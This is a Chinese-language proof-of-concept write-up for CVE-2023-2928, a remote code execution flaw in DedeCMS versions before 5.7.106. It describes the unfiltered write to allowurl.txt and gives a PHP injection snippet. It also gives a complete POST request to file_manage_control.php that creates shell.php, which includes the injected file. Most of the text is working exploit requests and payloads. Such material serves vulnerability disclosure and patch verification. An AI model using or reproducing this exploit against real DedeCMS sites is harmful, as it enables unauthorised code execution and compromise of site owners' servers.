# DedeCMS 5.7 file_manage_control.php 文件包含 RCE CVE-2023-2928

## 漏洞描述

版本 5.7.106 之前的 DedeCMS 中存在漏洞，`/dede/article_allowurl_edit.php` 缺少对该文件中写入内容的过滤，结合 `/dede/file_manage_control.php` 文件构造文件包含代码，将构成远程代码执行。

## 漏洞影响

```
DedeCMS < 5.7.106
```

## 漏洞复现

文件 `/dede/article_allowurl_edit.php` 中未对文件内容做任何过滤，会把内容写入到

`/data/admin/allowurl.txt` 这个文件当中。

访问文件 `/dede/article_allowurl_edit.php`：

```
www.dedecms.com
www.desdev.cn
bbs.dedecms.com
<?php phpinfo();?>
```

![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327140733554.png)

通过`/dede/file_manage_control.php`文件构造文件包含代码：

```shell
# Payload
fmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=<?php include_once("./data/admin/allowurl.txt");?>
```

```
POST /dede/file_manage_control.php HTTP/1.1
Host: <YOUR_IP>
Content-Length: 135
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<YOUR_IP>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://<YOUR_IP>/dede/article_allowurl_edit.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: 
Connection: close

fmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=%3C%3Fphp+include_once%28%22.%2Fdata%2Fadmin%2Fallowurl.txt%22%29%3B%3F%3E
```

![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327141101710.png)

成功写入，访问：

```
http://<YOUR_IP>/shell.php
```

![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327141412133.png)